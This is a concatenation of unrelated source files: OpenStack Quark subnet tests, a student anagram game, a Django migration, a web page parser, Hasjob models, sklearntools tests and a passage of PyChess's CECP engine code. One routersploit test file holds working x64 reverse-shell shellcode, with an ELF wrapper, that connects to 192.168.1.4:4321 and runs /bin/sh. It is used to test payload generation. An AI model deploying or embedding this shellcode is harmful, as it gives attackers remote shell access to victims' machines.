def __exit__(*args, **kwargs):
pass
self.context.session.begin = FakeContext
s["network"] = models.Network()
s["network"]["created_at"] = s["created_at"]
subnet = models.Subnet(**s)
db_mod = "quark.db.api"
api_mod = "neutron.openstack.common.notifier.api"
time_mod = "neutron.openstack.common.timeutils"
with contextlib.nested(
mock.patch("%s.subnet_find" % db_mod),
mock.patch("%s.network_find" % db_mod),
mock.patch("%s.subnet_create" % db_mod),
mock.patch("%s.ip_policy_create" % db_mod),
mock.patch("%s.subnet_delete" % db_mod),
mock.patch("%s.notify" % api_mod),
mock.patch("%s.utcnow" % time_mod)
) as (sub_find, net_find, sub_create, pol_cre, sub_del, notify,
time_func):
sub_create.return_value = subnet
sub_find.return_value = subnet
time_func.return_value = deleted_at
yield notify
def test_create_subnet_notification(self):
s = dict(network_id=1, cidr="192.168.10.0/24",
tenant_id=1, id=1, created_at="123")
with self._stubs(s) as notify:
self.plugin.create_subnet(self.context, dict(subnet=s))
notify.assert_called_once_with(
self.context,
notifier_api.publisher_id("network"),
"ip_block.create",
notifier_api.CONF.default_notification_level,
dict(tenant_id=s["tenant_id"],
ip_block_id=s["id"],
created_at=s["created_at"]))
def test_delete_subnet_notification(self):
now = time.strftime('%Y-%m-%d %H:%M:%S')
later = time.strftime('%Y-%m-%d %H:%M:%S')
s = dict(tenant_id=1, id=1, created_at=now)
with self._stubs(s, deleted_at=later) as notify:
self.plugin.delete_subnet(self.context, 1)
notify.assert_called_once_with(
self.context,
notifier_api.publisher_id("network"),
"ip_block.delete",
notifier_api.CONF.default_notification_level,
dict(tenant_id=s["tenant_id"],
created_at=s["created_at"],
ip_block_id=s["id"],
deleted_at=later))
class TestQuarkDiagnoseSubnets(test_quark_plugin.TestQuarkPlugin):
@contextlib.contextmanager
def _stubs(self, subnets=None, routes=None):
if routes is None:
routes = []
route_models = []
for route in routes:
r = models.Route()
r.update(route)
route_models.append(r)
if isinstance(subnets, list):
subnet_models = []
for subnet in subnets:
s_dict = subnet.copy()
s_dict["routes"] = route_models
s = models.Subnet(network=models.Network())
s.update(s_dict)
subnet_models.append(s)
elif subnets:
mod = models.Subnet(network=models.Network())
mod.update(subnets)
mod["routes"] = route_models
subnet_models = mod
else:
subnet_models = None
with mock.patch("quark.db.api.subnet_find") as subnet_find:
subnet_find.return_value = subnet_models
yield
def test_diagnose_subnet_with_wildcard_id_no_existing_subnets(self):
with self._stubs(subnets=[], routes=[]):
expected = {'subnets': []}
actual = self.plugin.diagnose_subnet(self.context, "*", None)
self.assertEqual(expected, actual)
def test_diagnose_subnet_with_wildcard_with_existing_subnets(self):
subnet_id = str(uuid.uuid4())
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=[subnet], routes=[route]):
actual = self.plugin.diagnose_subnet(self.context, "*", None)
self.maxDiff = None
self.assertEqual(subnet["id"], actual["subnets"][0]["id"])
def test_diagnose_subnet_with_regular_id(self):
subnet_id = "12345"
route = dict(id=1, cidr="0.0.0.0/0", gateway="192.168.0.1")
subnet = dict(id=subnet_id, network_id=1, name=subnet_id,
tenant_id=self.context.tenant_id, ip_version=4,
cidr="192.168.0.0/24", gateway_ip="192.168.0.1",
dns_nameservers=[],
enable_dhcp=None)
with self._stubs(subnets=subnet, routes=[route]):
actual = self.plugin.diagnose_subnet(self.context, subnet_id, None)
self.assertEqual(subnet["id"], actual["subnets"]["id"])
| apache-2.0 | 5,589,751,111,151,484,000 | 43.042373 | 79 | 0.546469 | false |
Mariaanisimova/pythonintask | IVTa/2014/EGOROV_V_I/task_8_8.py | 1 | 2933 | # Task 8. Variant 8
'''
Extend the "Anagrams" game (see M. Dawson,
"Python Programming for the Absolute Beginner", ch. 4) so that
every word comes with a hint. The player should earn
the right to a hint only when they have no idea what
the word is. Design a scoring system in which players
who guess the word without a hint score more than
those who asked for one.
'''
# Egorov V. I.
# 15.05.2016
from random import shuffle, choice
fine = 0
score = 0
attempts = 3
cont = 1
while cont == 1 and attempts > 0:
def score_print(score):
print ('У вас', score, 'очков')
print ('У вас', attempts, 'попытки')
words_and_info = (
('Венера', 'Самая горячая планета Солнечной системы.'),
('Меркурий', 'Эта планета самая ближняя к Солнцу'),
('Юпитер', 'Самая большая планета Солнечной системы'),
('Плутон', 'Самая маленькая планета Солнечной системы'),
('Земля', 'Существование жизни на этой планете не оставляет никаких сомнений'),
('Сатурн', 'Эта планета имеет ярко выраженную систему колец'),
('Марс', 'На самом деле на этой плане есть вода'),
('Уран', 'Кажется, этой планете не сообщили, что обращаться вокруг своей оси нужно с востока на запад'),
('Нептун', 'Злые языки говорят, что именно эта планета - самая дальняя от Солнца в её системе.')
)
choiced = choice(words_and_info)
word = list(choiced[0].lower())
shuffle(word)
word = ''.join(word)
print('Отгадай планету Солнечной системы -', word)
print('Наберите "подсказка", чтобы получить совет')
score_print(score)
fine=0
while True and attempts > 0:
gues = input('> ').lower()
if gues.lower() == 'подсказка':
print('Подскaзка: ', choiced[1])
fine=1
score_print(score)
continue
elif gues.lower() == choiced[0].lower():
print('Правильно -', choiced[0])
score += 2 - fine
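            # Scoring note: "fine" becomes 1 once a hint has been requested,
            # so a word guessed without a hint is worth 2 points and a word
            # guessed after a hint is worth only 1.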
score_print(score)
break
else:
print('Не правильно')
attempts -= 1
score_print(score)
yepnope=input('Продолжить?')
if yepnope == 'да' or yepnope == 'Да':
cont = 1
else:
cont = 0
input('Нажмите ENTER...')
| apache-2.0 | -1,640,939,314,107,939,300 | 27.333333 | 105 | 0.683333 | false |
dasseclab/dasseclab | clones/routersploit/tests/payloads/x64/test_reverse_tcp.py | 1 | 1678 | from routersploit.modules.payloads.x64.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321
reverse_tcp = (
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
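# Added annotation (not from the original test): the byte sequence
# "\x02\x00\x10\xe1\xc0\xa8\x01\x04" inside the shellcode encodes the
# sockaddr_in used by the connect call: AF_INET ("\x02\x00"), port 4321 in
# network byte order ("\x10\xe1" == 0x10E1) and the address 192.168.1.4
# ("\xc0\xa8\x01\x04"), matching the lhost/lport set in the test below.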
# elf x64 reverse tcp
elf_x64_reverse_tcp = (
b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x02\x00\x3e\x00\x01\x00\x00\x00\x78\x00\x40\x00\x00\x00"
b"\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x38\x00\x01\x00\x00\x00"
b"\x00\x00\x00\x00\x01\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
b"\x40\x00\x00\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x0c"
b"\x01\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48"
b"\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10"
b"\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58"
b"\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"
)
def test_payload_generation():
""" Test scenario - payload generation """
payload = Payload()
payload.lhost = "192.168.1.4"
payload.lport = 4321
assert payload.generate() == reverse_tcp
assert payload.generate_elf(reverse_tcp) == elf_x64_reverse_tcp
| gpl-2.0 | 1,970,158,449,034,645,000 | 42.025641 | 67 | 0.679976 | false |
flavoi/diventi | diventi/ebooks/migrations/0110_auto_20200830_1750.py | 1 | 3345 | # Generated by Django 2.2.13 on 2020-08-30 15:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ebooks', '0109_auto_20200821_1049'),
]
operations = [
migrations.AlterField(
model_name='book',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='chapter',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='part',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='replacementrule',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='secret',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='section',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='sectionaspect',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
migrations.AlterField(
model_name='universalsection',
name='color',
field=models.CharField(blank=True, choices=[('info', 'Light blue'), ('primary', 'Blue'), ('danger', 'Red'), ('warning', 'Yellow'), ('success', 'Green'), ('secondary', 'Gray'), ('dark', 'Black'), ('light', 'White')], default='default', max_length=30, verbose_name='color'),
),
]
| apache-2.0 | 6,576,685,759,129,036,000 | 62.113208 | 284 | 0.556652 | false |
Malphaet/vkyweb | generator/file_parser.py | 1 | 6822 | # Copyleft (c) 2016 Cocobug All Rights Reserved.
# -*- coding: utf_8 -*-
import os,sys,codecs
import re
import traceback
class WebPage(object):
"A webpage object, with some variables and all localisations"
def __init__(self,path):
self.path=path
self.name=os.path.split(path)[-1]
self.variables={}
self.list_of_lang=set()
self.reserved=set(["model"])
self.reserved_prefix="reserved_"
self.content=[]
def init_reserved(self,*others):
"Init all the reserved variables, note that no protections are used, so use them at your own risk"
for i in others:
self.reserved.add(i)
for key in self.reserved:
setattr(self,key,"")
def set_reserved(self,var,value=""):
"Set a reserved variable"
        setattr(self,self.reserved_prefix+var,value)
def get_reserved(self,var):
"Get a reserved variable"
return getattr(self,self.reserved_prefix+var)
def add_content(self,text,lang):
"Add a line of content, with the appropriates langues"
self.content.append([text,lang])
def get_next_line(self,filter_lang="*"):
"Get a line of text, with a filter if needed"
for line,lang in self.content:
if self.match_with_lang(lang,filter_lang):
yield line
def match_with_lang(self,lang,filter_lang):
"""Will make sense if I ever use a translation table and not a clusterf*ck of strings"""
for l in lang:
if l=="*" or l==filter_lang:
return 1
return 0
def get_text(self,filter_lang):
"Get the whole text matching the filter, note that the * filter will ONLY match if the text is meant for all, not all text"
text=""
for line in self.get_next_line(filter_lang):
text+=line
text+=os.linesep
return text
def add_variable(self,var,value):
"""Add the folowing variable and update the necessary constants
Note that it's one of the only ways to add a language to the list_of_lang
Takes a variable (with an eventual langague tag) and it's value"""
var,lang=create_lang(var)
if var in self.reserved:
setattr(self,var,value)
else:
add_to_table(var,lang,value,self.variables)
self.list_of_lang.add(lang)
def get_variable(self,varname,filter_lang="*"):
"Get a variable, if * or nothing is used a filter the program will attempt to give a global variable, or will yield one at random"
#print "Getting",varname,filter_lang,"in",self.variables
#if varname in self.reserved:
# return getattr(self,varname)
if varname in self.variables:
if filter_lang in self.variables[varname]:
return self.variables[varname][filter_lang]
else:
if filter_lang=="*":
return self.variables[varname].values()[0]
return self.variables[varname]["*"]
raise KeyError("The variable "+varname+" doens't exist in the language "+filter_lang)
def export(self):
"Export the Webobject in every language"
exp={}
for lang in self.list_of_lang:
exp[lang]=self.get_text(lang)
return exp
def add_to_table(var,lang,value,table):
"For now it works in tandem with create_lang and add to a dict with the lang"
if var in table:
table[var][lang]=value
else:
table[var]={lang:value}
return table
def create_lang(var):
"""Takes a variable (with an eventual language tag) and it's value and return var,lang,value
Only the last _ determines the language, note that it could give the impression _ is ok to use in variables. It is not."""
s_var=var.rsplit('_',1)
if len(s_var)==2:
if "" in s_var:
return var,"*"
return s_var[0],s_var[1]
return var ,"*"
def parse_file(file_name):
"Parse a file and return a webpage object"
page=WebPage(file_name)
page.init_reserved()
with open(file_name) as f:
try:
while True: # Parse the config file
line=f.readline()
if not line: # Wait for the last line
break
if line.startswith("----"): # Not really a good practice, but meh
break
if line!=os.linesep: # Now parsing config files
var,value=re_config_line.match(line).groups()
page.add_variable(var,value)
used_langs={} # Keep trace of all used langs and opened/closed matchs
while True: # The config lines are now parsed, will now enter the nightmare of standart lines
line=f.readline()
if not line: # Wait for the last line
break
match=re_text_line.match(line) #Will always match since there is a .* in the regex
beg_lang,end_lang,text=match.groups()
page_text=[]
                if beg_lang: # Will now add a lang to which the program should write
if beg_lang in used_langs:
used_langs[beg_lang]+=1
else:
used_langs[beg_lang]=1
elif end_lang:
if end_lang in used_langs:
used_langs[end_lang]-=1
else:
used_langs[end_lang]=0 # This should never happen, but...users
elif text:
line_langs=[] # Langs used in the current line
for l in used_langs: #
if used_langs[l]>0:
line_langs.append(l)
if len(line_langs)==0: # If no langs are used, print in every lang (standart behavior)
line_langs=["*"]
page.add_content(text,line_langs)
except re.error:
print("Error parsing",file_name,"contain a non parsable line:")
print(" >",line)
except:
traceback.print_exc()
page.list_of_lang.update(used_langs) # Not sure this fix is actually a good idea, could just force adding langs in variables
return page
re_config_line=re.compile("(?P<variable>.+): (?P<value>.*)")
re_text_line=re.compile("__(?P<beg_lang>[\*\w]+)__|__/(?P<end_lang>[\*\w]+)__|(?P<text>.*)")
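# Illustrative sketch of the source file layout these regexes expect (added
# annotation, inferred from parse_file rather than taken from project docs):
# a block of "variable: value" lines, a "----" separator, then the page body,
# where "__fr__" ... "__/fr__" (or any other tag) wraps language-specific text
# and untagged lines are written for every language:
#
#   title_fr: Accueil
#   title_en: Home
#   ----
#   __fr__
#   Bonjour
#   __/fr__
#   __en__
#   Hello
#   __/en__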
if __name__ == '__main__':
import tree_parser
config=parse_file("sites/example_website/_config.txt")
index=parse_file("sites/example_website/index.txt")
print("All text only")
print(index.get_text("*"))
print("Fr text only")
print(index.get_text("fr"))
print("En text only")
print(index.get_text("en"))
| unlicense | 2,348,765,967,386,563,000 | 37.982857 | 138 | 0.572266 | false |
sindhus/hasjob | hasjob/models/__init__.py | 1 | 2623 | # -*- coding: utf-8 -*-
# flake8: noqa
from datetime import timedelta
from coaster import LabeledEnum
from coaster.db import db
from coaster.sqlalchemy import (BaseMixin, BaseNameMixin, TimestampMixin, BaseScopedIdMixin,
BaseScopedNameMixin, CoordinatesMixin, make_timestamp_columns)
from .. import app
agelimit = timedelta(days=30)
newlimit = timedelta(days=1)
class POSTSTATUS:
DRAFT = 0 # Being written
PENDING = 1 # Pending email verification
CONFIRMED = 2 # Post is now live on site
REVIEWED = 3 # Reviewed and cleared for push channels
REJECTED = 4 # Reviewed and rejected as inappropriate
WITHDRAWN = 5 # Withdrawn by owner
FLAGGED = 6 # Flagged by users for review
SPAM = 7 # Marked as spam
MODERATED = 8 # Moderated, needs edit
ANNOUNCEMENT = 9 # Special announcement
CLOSED = 10 # Not accepting applications, but publicly viewable
UNPUBLISHED = (DRAFT, PENDING)
GONE = (REJECTED, WITHDRAWN, SPAM)
LISTED = (CONFIRMED, REVIEWED, ANNOUNCEMENT)
POSTPENDING = (CONFIRMED, REVIEWED, REJECTED, WITHDRAWN, FLAGGED, SPAM, MODERATED, ANNOUNCEMENT)
MY = (DRAFT, PENDING, CONFIRMED, REVIEWED, MODERATED, ANNOUNCEMENT, CLOSED)
ARCHIVED = (CONFIRMED, REVIEWED, ANNOUNCEMENT, CLOSED)
class CURRENCY(LabeledEnum):
INR = ('INR', 'INR')
USD = ('USD', 'USD')
EUR = ('EUR', 'EUR')
__order__ = (INR, USD, EUR)
class EMPLOYER_RESPONSE(LabeledEnum):
NEW = (0, u"New") # New application
PENDING = (1, u"Pending") # Employer viewed on website
IGNORED = (2, u"Ignored") # Dismissed as not worth responding to
REPLIED = (3, u"Replied") # Employer replied to candidate
FLAGGED = (4, u"Flagged") # Employer reported a spammer
SPAM = (5, u"Spam") # Admin marked this as spam
REJECTED = (6, u"Rejected") # Employer rejected candidate with a message
class PAY_TYPE(LabeledEnum):
NOCASH = (0, u"Nothing")
ONETIME = (1, u"One-time")
RECURRING = (2, u"Recurring")
class CANDIDATE_FEEDBACK(LabeledEnum):
NORESPONSE = (0, u"No response")
INPROCESS = (1, u"In process")
DID_NOT_GET = (2, u"Did not get the job")
DID_NOT_ACCEPT = (3, u"Got offer, did not accept")
GOT_JOB = (4, u"Got the job")
from .user import *
from .jobcategory import *
from .jobpostreport import *
from .jobtype import *
from .location import *
from .tag import *
from .reportcode import *
from .jobpost import *
from .domain import *
from .board import *
from .flags import *
from .campaign import *
| agpl-3.0 | 6,810,176,725,132,138,000 | 32.628205 | 100 | 0.655738 | false |
jcrudy/sklearntools | sklearntools/test/test_transformers.py | 1 | 3613 | from sklearntools.transformers import Constant, VariableTransformer, Identity,\
Censor, NanMap, Log
import numpy as np
import pandas
from numpy.testing.utils import assert_array_almost_equal
from sklearn.datasets.base import load_boston
from pyearth.earth import Earth
from sklearntools.calibration import ResponseTransformingEstimator
from sklearn.metrics.regression import r2_score
# from sklearntools.sym.printers import exec_module, model_to_code
def test_with_response_transformation():
X, y = load_boston(return_X_y=True)
log_y = np.log(y)
X = pandas.DataFrame(X, columns=['x%d' % i for i in range(X.shape[1])])
y = pandas.DataFrame(y, columns=['y'])
transformer = VariableTransformer(dict(y=Log(Identity('y'))))
model = ResponseTransformingEstimator(Earth(), transformer)
model.fit(X, y)
log_y_pred = model.predict(X)
assert r2_score(log_y, log_y_pred) > .8
assert r2_score(y, log_y_pred) < .1
def test_transformation_system():
np.random.seed(1)
x = Identity('x')
y = Identity('y')
z = Identity('z')
d = (x + y) / z
transformer = VariableTransformer(dict(d=d), exclusive=True)
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
transformer.fit(X)
assert_array_almost_equal(transformer.transform(X)['d'], (X['x'] + X['y']) / X['z'])
# numpy_test_module = exec_module('numpy_test_module', model_to_code(transformer, 'numpy', 'transform', 'test_model'))
# assert_array_almost_equal(pandas.DataFrame(dict(zip(['x', 'y', 'z', 'd'], numpy_test_module.test_model(**X))))[['x', 'y', 'z', 'd']], transformer.transform(X))
def test_rate():
np.random.seed(1)
X = pandas.DataFrame({'count': np.random.poisson(1., size=100), 'duration': np.random.poisson(5., size=100)})
rate = Censor(Identity('count') / Identity('duration'), Identity('duration') < 4)
transformer = VariableTransformer(dict(rate=rate))
transformer.fit(X)
target = X['count'] / X['duration']
target[X['duration'] < 4] = np.nan
assert_array_almost_equal(transformer.transform(X)['rate'], target)
# numpy_test_module = exec_module('numpy_test_module', model_to_code(transformer, 'numpy', 'transform', 'test_model'))
# assert_array_almost_equal(pandas.DataFrame(dict(zip(['count', 'duration', 'rate'], numpy_test_module.test_model(**X))))[['count', 'duration', 'rate']], transformer.transform(X))
def test_uncensor():
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
X.loc[1,'x'] = np.nan
X.loc[2, 'y'] = np.nan
transformer = NanMap({'x': 100.})
transformer.fit(X)
X_ = transformer.transform(X)
assert_array_almost_equal(X['y'], X_['y'])
assert not (X['x'] == X_['x']).all()
fix = X['x'].copy()
fix[1] = 100.
assert_array_almost_equal(fix, X_['x'])
def test_non_strict():
X = pandas.DataFrame(np.random.normal(size=(10,3)), columns=['x','y','z'])
X.loc[1,'x'] = np.nan
X.loc[2, 'y'] = np.nan
transformer = NanMap({'x': 100.,
'w': 0.})
transformer.fit(X)
X_ = transformer.transform(X)
assert_array_almost_equal(X['y'], X_['y'])
assert not (X['x'] == X_['x']).all()
fix = X['x'].copy()
fix[1] = 100.
assert_array_almost_equal(fix, X_['x'])
if __name__ == '__main__':
import sys
import nose
# This code will run the test in this file.'
module_name = sys.modules[__name__].__file__
result = nose.run(argv=[sys.argv[0],
module_name,
'-s', '-v'])
| bsd-3-clause | 5,028,816,710,361,895,000 | 38.703297 | 183 | 0.612787 | false |
leogregianin/pychess | lib/pychess/Players/CECPEngine.py | 1 | 39654 |
import asyncio
import itertools
import re
from gi.repository import Gtk, GObject
from pychess.compat import create_task
from pychess.Utils import wait_signal
from pychess.System import conf
from pychess.System.Log import log
from pychess.widgets import mainwindow
from pychess.Utils.Move import Move
from pychess.Utils.Board import Board
from pychess.Utils.Cord import Cord
from pychess.Utils.Move import toSAN, toAN, parseAny
from pychess.Utils.Offer import Offer
from pychess.Utils.const import ANALYZING, INVERSE_ANALYZING, DRAW, WHITEWON, BLACKWON, \
WON_ADJUDICATION, DRAW_OFFER, ACTION_ERROR_NONE_TO_ACCEPT, CASTLE_KK, WHITE, \
CASTLE_SAN, FISCHERRANDOMCHESS, BLACK, reprSign, RESIGNATION
from pychess.Utils.logic import validate, getMoveKillingKing
from pychess.Utils.lutils.ldata import MATE_VALUE
from pychess.Utils.lutils.lmove import ParsingError
from pychess.Variants import variants
from pychess.Players.Player import PlayerIsDead, TurnInterrupt, InvalidMove
from .ProtocolEngine import ProtocolEngine, TIME_OUT_SECOND
movere = re.compile(r"""
( # group start
(?: # non grouping parenthesis start
[PKQRBN]? # piece
[a-h]?[1-8]? # unambiguous column or line
x? # capture
@? # drop
[a-h][1-8] # destination square
=?[QRBN]? # promotion
|O\-O(?:\-O)? # castling
|0\-0(?:\-0)? # castling
) # non grouping parenthesis end
[+#]? # check/mate
) # group end
\s* # any whitespace
""", re.VERBOSE)
d_plus_dot_expr = re.compile(r"\d+\.")
anare = re.compile("""
^ # beginning of string
(\s* #
\d+ [+\-\.]? # The ply analyzed. Some engines end it with a dot, minus or plus
\s+) #
(-?Mat\s*\d+ | [+\-\d\.]+) # The score found in centipawns.
# Mat1 is used by gnuchess to specify mate in one.
# otherwise we should support a signed float
\s+ #
([\d\.]+) # The time used in centi-seconds
\s+ #
([\d\.]+) # Number of nodes visited
\s+ #
(.+) # The Principal-Variation. With or without move numbers
\s* #
$ # end of string
""", re.VERBOSE)
# anare = re.compile("\(d+)\.?\s+ (Mat\d+|[-\d\.]+) \s+ \d+\s+\d+\s+((?:%s\s*)+)" % mov)
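# Illustrative example (added annotation, not part of the original source):
# a typical CECP "post" line such as "9 156 1084 48000 1. e4 e5 2. Nf3 Nc6"
# is split by anare into depth "9", score "156" (centipawns), time "1084"
# (centiseconds), nodes "48000" and the PV "1. e4 e5 2. Nf3 Nc6".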
whitespaces = re.compile(r"\s+")
# There is no way in the CECP protocol to determine if an engine not answering
# the protover=2 handshake with done=1 is old or just very slow. Thus we
# need a timeout after which we conclude the engine is 'protover=1' and will
# never answer.
# XBoard will only give 2 seconds, but as we are quite sure that
# the engines support the protocol, we can add more. We don't add
# infinite time though, just in case.
# The engine can get more time by sending done=0
class CECPEngine(ProtocolEngine):
def __init__(self, subprocess, color, protover, md5):
ProtocolEngine.__init__(self, subprocess, color, protover, md5)
self.features = {
"ping": 0,
"setboard": 0,
"playother": 0,
"san": 0,
"usermove": 0,
"time": 1,
"draw": 1,
"sigint": 0,
"sigterm": 0,
"reuse": 0,
"analyze": 0,
"myname": ', '.join(self.defname),
"variants": None,
"colors": 1,
"ics": 0,
"name": 0,
"pause": 0,
"nps": 0,
"debug": 0,
"memory": 0,
"smp": 0,
"egt": '',
"option": '',
"exclude": 0,
"done": None,
}
self.supported_features = [
"ping", "setboard", "san", "usermove", "time", "draw", "sigint",
"analyze", "myname", "variants", "colors", "pause", "done", "egt",
"debug", "smp", "memory", "option"
]
self.options = {}
self.options["Ponder"] = {"name": "Ponder",
"type": "check",
"default": False}
self.name = None
self.board = Board(setup=True)
# if self.engineIsInNotPlaying == True, engine is in "force" mode,
# i.e. not thinking or playing, but still verifying move legality
self.engineIsInNotPlaying = False
self.engineIsAnalyzing = False
self.movenext = False
self.waitingForMove = False
self.readyForMoveNowCommand = False
self.timeHandicap = 1
self.lastping = 0
self.lastpong = 0
self.queue = asyncio.Queue()
self.parse_line_task = create_task(self.parseLine(self.engine))
self.died_cid = self.engine.connect("died", lambda e: self.queue.put_nowait("die"))
self.invalid_move = None
self.optionQueue = []
self.undoQueue = []
self.ready_moves_event = asyncio.Event()
self.cids = [
self.connect_after("readyForOptions", self.__onReadyForOptions),
self.connect_after("readyForMoves", self.__onReadyForMoves),
]
# Starting the game
def prestart(self):
print("xboard", file=self.engine)
if self.protover == 1:
# start a new game (CECPv1 engines):
print("new", file=self.engine)
# we are now ready for options:
self.emit("readyForOptions")
elif self.protover == 2:
# start advanced protocol initialisation:
print("protover 2", file=self.engine)
# we don't start a new game for CECPv2 here,
# we will do it after feature accept/reject is completed.
def start(self, event, is_dead):
create_task(self.__startBlocking(event, is_dead))
@asyncio.coroutine
def __startBlocking(self, event, is_dead):
if self.protover == 1:
self.emit("readyForMoves")
return_value = "ready"
if self.protover == 2:
try:
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
if return_value == "not ready":
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
# Gaviota sends done=0 after "xboard" and after "protover 2" too
if return_value == "not ready":
return_value = yield from asyncio.wait_for(self.queue.get(), TIME_OUT_SECOND)
self.emit("readyForOptions")
self.emit("readyForMoves")
except asyncio.TimeoutError:
log.warning("Got timeout error", extra={"task": self.defname})
is_dead.add(True)
except Exception:
log.warning("Unknown error", extra={"task": self.defname})
is_dead.add(True)
else:
if return_value == "die":
is_dead.add(True)
assert return_value == "ready" or return_value == "del"
if event is not None:
event.set()
def __onReadyForOptions(self, self_):
# We always want post turned on so the Engine Output sidebar can
# show those things -Jonas Thiem
print("post", file=self.engine)
for command in self.optionQueue:
print(command, file=self.engine)
def __onReadyForMoves(self, self_):
if self.mode in (ANALYZING, INVERSE_ANALYZING):
# workaround for crafty not sending analysis after it has found a mating line
# http://code.google.com/p/pychess/issues/detail?id=515
if "crafty" in self.features["myname"].lower():
print("noise 0", file=self.engine)
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
self.ready_moves_event.set()
self.readyMoves = True
# Ending the game
def end(self, status, reason):
self.parse_line_task.cancel()
if self.engine.handler_is_connected(self.died_cid):
self.engine.disconnect(self.died_cid)
if self.handler_is_connected(self.analyze_cid):
self.disconnect(self.analyze_cid)
for cid in self.cids:
if self.handler_is_connected(cid):
self.disconnect(cid)
self.board = None
if self.connected:
            # We currently can't fill out the comment "field" as the repr strings
            # for reasons and statuses live in Main.py
            # Creating Status and Reason classes would solve this
if status == DRAW:
print("result 1/2-1/2 {?}", file=self.engine)
elif status == WHITEWON:
print("result 1-0 {?}", file=self.engine)
elif status == BLACKWON:
print("result 0-1 {?}", file=self.engine)
else:
print("result * {?}", file=self.engine)
if reason == WON_ADJUDICATION:
self.queue.put_nowait("invalid")
# Make sure the engine exits and do some cleaning
self.kill(reason)
def kill(self, reason):
""" Kills the engine, starting with the 'quit' command, then sigterm and
eventually sigkill.
        Returns the exitcode, or if the engine has already been killed, returns
None """
if self.connected:
self.connected = False
try:
try:
print("quit", file=self.engine)
self.queue.put_nowait("del")
self.engine.terminate()
except OSError as err:
# No need to raise on a hang up error, as the engine is dead
# anyways
if err.errno == 32:
log.warning("Hung up Error", extra={"task": self.defname})
return err.errno
else:
raise
finally:
# Clear the analyzed data, if any
self.emit("analyze", [])
# Send the player move updates
def setBoard(self, board, search=True):
def coro():
if self.engineIsAnalyzing:
self.__stop_analyze()
yield from asyncio.sleep(0.1)
self.setBoardList([board], [])
if search:
self.__sendAnalyze(self.mode == INVERSE_ANALYZING)
create_task(coro())
def putMove(self, board1, move, board2):
""" Sends the engine the last move made (for spectator engines).
@param board1: The current board
@param move: The last move made
@param board2: The board before the last move was made
"""
def coro():
if self.engineIsAnalyzing:
self.__stop_analyze()
yield from asyncio.sleep(0.1)
self.setBoardList([board1], [])
if not self.analyzing_paused:
